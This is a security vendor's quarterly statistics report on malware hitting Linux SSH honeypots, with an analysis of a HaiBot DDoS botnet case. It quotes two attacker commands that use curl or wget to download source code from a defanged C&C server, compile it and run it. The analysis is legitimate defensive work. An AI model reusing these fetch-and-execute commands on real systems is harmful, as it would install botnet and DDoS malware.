Statistics Report of Malware Targeting Linux SSH Servers in Q3 2025
AhnLab SEcurity intelligence Center (ASEC) is using a honeypot to respond to and categorize brute-force and dictionary attacks that target poorly managed Linux SSH servers. This post covers the status of the attack sources identified in logs from the third quarter of 2025 and the statistics of attacks performed by these sources. It also classifies the malware used in each attack and provides detailed statistics.
1. Status of Attacks on Linux SSH Servers
The following are statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the third quarter of 2025.
Figure 1. Attacks on Linux SSH servers in the 3rd quarter of 2025
The types of malware used in attacks are mostly worms, coin miners, or DDoS bots, with other types including backdoors and others. Although the attacks target servers with SSH services installed, it is worth noting that IoT DDoS bots, which typically target IoT devices, are also being used. Notable examples include Mirai and Gafgyt. Tsunami is another example, but unlike other IoT DDoS bots, it is distributed not only to IoT devices but also to Linux servers. Other Linux DDoS bots include ShellBot and XorDDoS. As for coin miners, there are various cases involving the installation of XMRig, as well as other types such as Prometei and P2PInfect.
2. Attacks in the 3rd Quarter of 2025
In the third quarter of 2025, a HaiBot attack case was identified where the threat actor built the source code and used it directly. The following string in Vietnamese instructing to enter the correct parameters into the C&C server shows that the malware creator is likely a Vietnamese speaker. [1]
Figure 2. Vietnamese message set in the C&C server
The threat actor attempted to log in to the honeypot Linux server and upon success, executed the following types of commands.
# ( curl -sSL -o build.c “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” && gcc -o build build.c -lcurl && chmod +x build && ./build) || (curl -sSL -o build “hxxp://api.haitool[.]xyz:25614/files?file_name=build” && chmod +x build && ./build); sleep 10
# sh -c ‘curl -s “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” -o build.c 2>/dev/null || wget -qO build.c “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” && gcc -o build build.c -lcurl 2>/dev/null && chmod +x build && ./build || (curl -s “hxxp://api.haitool[.]xyz:25614/files?file_name=build” -o build 2>/dev/null || wget -qO build “hxxp://api.haitool[.]xyz:25614/files?file_name=build”) && chmod +x build && ./build; sleep 10’\
This command downloads the “build.c” file from the download server, builds it using gcc, and then executes it. The directly built “build” is a downloader that is responsible for downloading and building the Bot and DDoS tool before executing them. The malware, created under the name “ddos,” is a command-line tool that can perform DDoS attacks. When the Bot receives DDoS commands from the C&C server, it executes the DDoS tool with arguments to perform DDoS attacks.
Figure 3. Command arguments of the DDoS tool
The DDoS tool only supports UDP flood attacks and can send NULL, a string of “A” characters equal to the specified size, or random strings when transmitting DDoS packets.
The Bot built with the name “bot_net” can connect to the C&C server and periodically receive commands regarding the attack target. If the commands include the victim’s IP and port address, the DDoS tool can be executed with the arguments to perform a DDoS attack on the victim’s system. Communications with the C&C server occur as follows: upon initial execution, the status is set to report and transmitted, and then the check is sent periodically to receive the attack target in response. As of now, the commands regarding the attack target have not been identified.
Figure 4. Communication with the C&C server
※ Please refer to the attachment for more details.
